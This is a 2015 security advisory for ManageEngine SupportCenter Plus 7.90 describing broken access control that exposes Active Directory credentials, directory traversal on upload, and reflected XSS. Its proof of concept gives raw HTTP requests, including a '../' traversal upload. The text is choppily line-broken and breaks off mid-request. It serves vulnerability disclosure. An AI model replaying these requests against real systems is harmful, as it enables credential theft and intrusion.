2015-06-19

Document Title:
===============
ManageEngine SupportCenter Plus 7.90 - Multiple Vulnerabilities

References (Source):
====================
http://www.vulnerability-lab.

com/get_content.php?id=1501

Release Date:
=============
2015-06-19

Vulnerability Laboratory ID (VL-ID):
==============================

======
1501

Common Vulnerability Scoring System:
==============================

======
6.9

Product & Service Introduction:
==============================

=
SupportCenter Plus is a web-based customer support software that lets organizations
effectively manage customer tickets, their account andcontact information, the service
contracts and in the process providing a superior customer experience. SupportCenter
Plus is commonly deployed on internet accessible interfaces to allow customers to access
the application. This common deployment scenario often involves a combination of
low privilege accounts for customers (typically local authentication) and higher privilege
accounts for help desk stuff (typically Active Directoryintegrated). Note that it is not unusual
to allow any internet user to be able to register a low privilege account. This deployment
scenario isimportant to consider when evaluating the risk of the below vulnerabilities.

(Copy of the Vendor Homepage: https://www.manageengine.com/

products/support-center/ )

Abstract Advisory Information:
==============================
An indepndent vulnerability researcher discovered multiple vulnerabilities in the official
ManageEngine SupportCenter Plus v7.90 web-application.

Vulnerability Disclosure Timeline:
==============================

====
2015-05-27:     Researcher Notification & Coordination (Alain Homewood)
2015-06-19:     Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Manage Engine
Product: SupportCenter Plus - Web Application 7.90

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
==============================

==
1.1 Improper authentication disclosing password (Authenticated) Missing user access control
mechanisms allow low privilege users to gain unauthorised access to sensitive Active Directory
integration functionality normally only accessibly by Administrators.

This functionality allows a low privilege user to:
1.) Retrieve the plain text user name and password for the domain account (typically Domain
Administrator or similar) used to integrate with Active Directory
2.) Configure arbitrary domains to be used for authentication and import users from these
domains (overwriting existing user records)

A low privilege user in SupportCenter Plus can gain privileged access to both the application
and any integrated domains. Typical attack scenarios could include:
1.) SupportCenter Plus is accessible via the internet. An internet based attacker who can gain
access to a low privilege account (registering an account if enabled or stealing an account) can
gain access to highly privileged domain credentials. The attacker can then use these credentials
to gain remote access to the organisation through other means (e.g. VPNs or physically in a
meeting room at the organisation).
2.) SupportCenter Plus is not accessible via the internet. An attacker who has gained a low level
of compromise in an organisation (i.e. any user who can access SupportCenter Plus) can use
these vulnerabilities to escalate themselves to domain administrator or similar.

Pre-requisites and considerations include:
- In order to steal existing domain credentials it is necessary for Active Directory integration
to have been setup.
- In order to import users from an attacker controlled domain it is necessary for the
SupportCenter Plus server to have network connectivity to the attacker server (i.e. firewall
rules may prevent this)
- It is possible to login to SupportCenter Plus using domain authentication even when this
option is hidden (typically done so that the domain name isn`t displayed on the internet
accessible login)

1.2 Directory traversal on file upload (Authenticated)
Low privilege users have the ability to attach files to work order requests (e.g. to attach a
screenshot).
This functionality is vulnerable to directory traversal and allows low privilege users to upload
files to arbitrary directories.

Potential impacts of this vulnerability include:
1.) Remote code execution ***
2.) Denial of service
3.) Uploading malicious static content to web accessible directories (e.g. JavaScript, malware etc)

*** There are two key limitations to this vulnerability that limit any easily exploitable method for
code execution through exploiting the underlying JBoss environment:
1.) A Java compiler is not installed as part of SupportCenter Plus which prevents uploaded JSP
files from being executed
2.) The uploaded directory always appends an additional directory (named after the user`s ID)
which prevents deployment of a packaged or unpackaged WAR file (or similar)

Despite the above limitations I cannot con conclusively determine that code execution is not possible.

1.3 Reflected cross site scripting (Authenticated)
Multiple authenticated reflected cross site scripting vulnerabilities exist in SupportCenter
Plus.

Unsanitised user provided input in the `query` parameter is echoed back to the user during
requests to /CustomReportHandler.do.
Only administrators (or similar highly privileged) users with access to the custom report
functionality are vulnerable to this attack vector.

Unsanitised user provided input in the `compAcct` parameter is echoed back to user d
uring requests to /jsp/ResetADPwd.jsp.
Unsanitised user provided input in the `redirectTo` parameter is echoed back to user
during requests to /jsp/CacheScreenWidth.jsp.
All authenticated users are vulnerable to these attack vectors.

Proof of Concept (PoC):
=======================
1.1
The vulnerability can be exploited by remote attackers without user interaction.
For security demonstration or to reproduce follow the provided information and steps below.

Manual steps to reproduce the vulnerability ...
1.) Set up a Active Directory domain
2.) Install SupportCenter Plus
3.) Login as an administrator and add a Windows domain and associated credentials
4.) Logout and login as a low privilege user (by default there is guest/guest account)
5.) Attempt to access the above URLs and observe that you can access the functionality
with no restrictions(e.g. browse to http://[VULNERABLE]/

EditDomain.do?action=

edit
WindowsDomain&

windowsDomainID=1&SUBREQUEST=

XMLHTTP and view the password
in the HTML source code)

Plain text domain credentials can be viewed in the HTML source code of the following
pages when logged in as low privilege user:
http://[VULNERABLE]/

EditDomain.do?action=

editWindowsDomain&

windowsDomainID=
1&SUBREQUEST=

XMLHTTP
http://[VULNERABLE]/

ImportADUsers.do

Additional domains can be added through browsing to http://[VULNERABLE]/

ImportADUsers.
do?action=

editWindowsDomain&

windowsDomainID=1&SUBREQUEST=

XMLHTTP and then
selecting "Add New Domain" which will allow you to enter the domain details resulting in a
POST similar to this:

POST /EditDomain.do?SUBREQUEST=

XMLHTTP HTTP/1.1
Host: [VULNERABLE]
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+

xml,application/xml;q=0.9,*/*;

q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-

urlencoded;charset=UTF-8
Referer: http://[VULNERABLE]:9090/

AdminHome.do
Content-Length: 181
Cookie: [object HTMLTableRowElement]=show; [object HTMLDivElement]=show; [object HTMLTableCellElement]=show; 3Adminhelpexp=helpexpshow; 3Adminhelpcoll=helpcollhide; JSESSIONID=

C14EA9B74F5D5C7B2F3055EA96F711

88; PREV_CONTEXT_PATH=; JSESSIONIDSSO=

391CCA5D883203EBE1CD84BEFCB261

44
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

name=TESTDOMAIN&

isPublicDomain=on&

domainController=CONTROLLER&

loginName
=Administrator&

password=Password123&id=1&

addButton=&cancel=Cancel&

updateButton=
Save&cancel=

Cancel&description=

Domain users can be imported by browsing to http://[VULNERABLE]/

ImportADUsers.do selecting
the domain and clicking next. You can then select the Operation Units (OUs) you want to import
from the domain and click "Start Import" resulting in a POST similar to this:

POST /ImportADUsers.do HTTP/1.1
Host: [VULNERABLE]
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+

xml,application/xml;q=0.9,*/*;

q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[VULNERABLE]:9090/

ImportADUsers.do
Cookie: [object HTMLTableRowElement]=show; [object HTMLDivElement]=show; [object HTMLTableCellElement]=show; PREV_CONTEXT_PATH=; JSESSIONID=

96062390B861F590
1A937CE3A71A8F

4D; JSESSIONIDSSO=

C5CBE9C1CB90CEA338318B903BEDE2

6A; 3Adminhelpexp=helpexpshow; 3Adminhelpcoll=helpcollhide
Connection: keep-alive
Content-Type: application/x-www-form-

urlencoded
Content-Length: 193

selectedOUs=2&importUser=

Start+Import&selectOUs=Next&

serverName=CONTROLLER&

domainName=TESTDOMAIN&

userName=Administrator&

userPassword=password123&

isRefresh=true&phone=true&

mobile=true&job=true&email=

true

1.2
The vulnerability can be exploited by remote attackers without user interaction.
For security demonstration or to reproduce follow the provided information and steps below.

Files are uploaded via a POST request to /workorder/Attachment.jsp?

component=Request

It is possible to manipulate the "module" parameters to traverse directories. Decompiled
source code of the creation of the file path is shown below:
String filePath1 = "Attachments" + filSep + module + filSep + userID1

Note that an additional directory (named after the user's ID) is always appended to file path.

In the below example POST a module value of ../../../../../../../../../../

../../ is specified and the
logged in user has an ID value of 2.

The resulting file in this case is uploaded to c:\2\payload.html on a Windows environment.

An example POST request is shown below:
POST /workorder/Attachment.jsp?

component=Request HTTP/1.1
Host: [VULNERABLE]:9090
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+

xml,application/xml;q=0.9,*/*;

q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[VULNERABLE]:9090/

workorder/Attachment.jsp?

component=Request
Cookie: [object HTMLTableRowElement]=show; [object HTMLDivElement]=show; [object HTMLTableCellElement]=show; PREV_CONTEXT_PATH=/custom; JSESSIONID=

DCB297647A29281C4E80C76898B4B0

9A; 3Adminhelpexp=helpexpshow; 3Adminhelpcoll=
helpcollhide; domainName=TESTDOMAIN; JSESSIONIDSSO=

A1E2CBF658231DF263F84A
994E27F5

36
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------

------

1739048610197008
8239358532669
Content-Length: 1110

-----------------------------

17390486101970088239358532669
Content-Disposition: form-data; name="filePath"; filename="payload.html"
Content-Type: application/octet-stream

test12345

-----------------------------

17390486101970088239358532669
Content-Disposition: form-data; name="filename"

payload.html
-----------------------------

17390486101970088239358532669
Content-Disposition: form-data; name="vecPath"

-----------------------------

17390486101970088239358532669
Content-Disposition: form-data; name="vec"

-----------------------------

17390486101970088239358532669
Content-Disposition: form-data; name="theSubmit"

AttachFile
<span style="background-color: white

Show more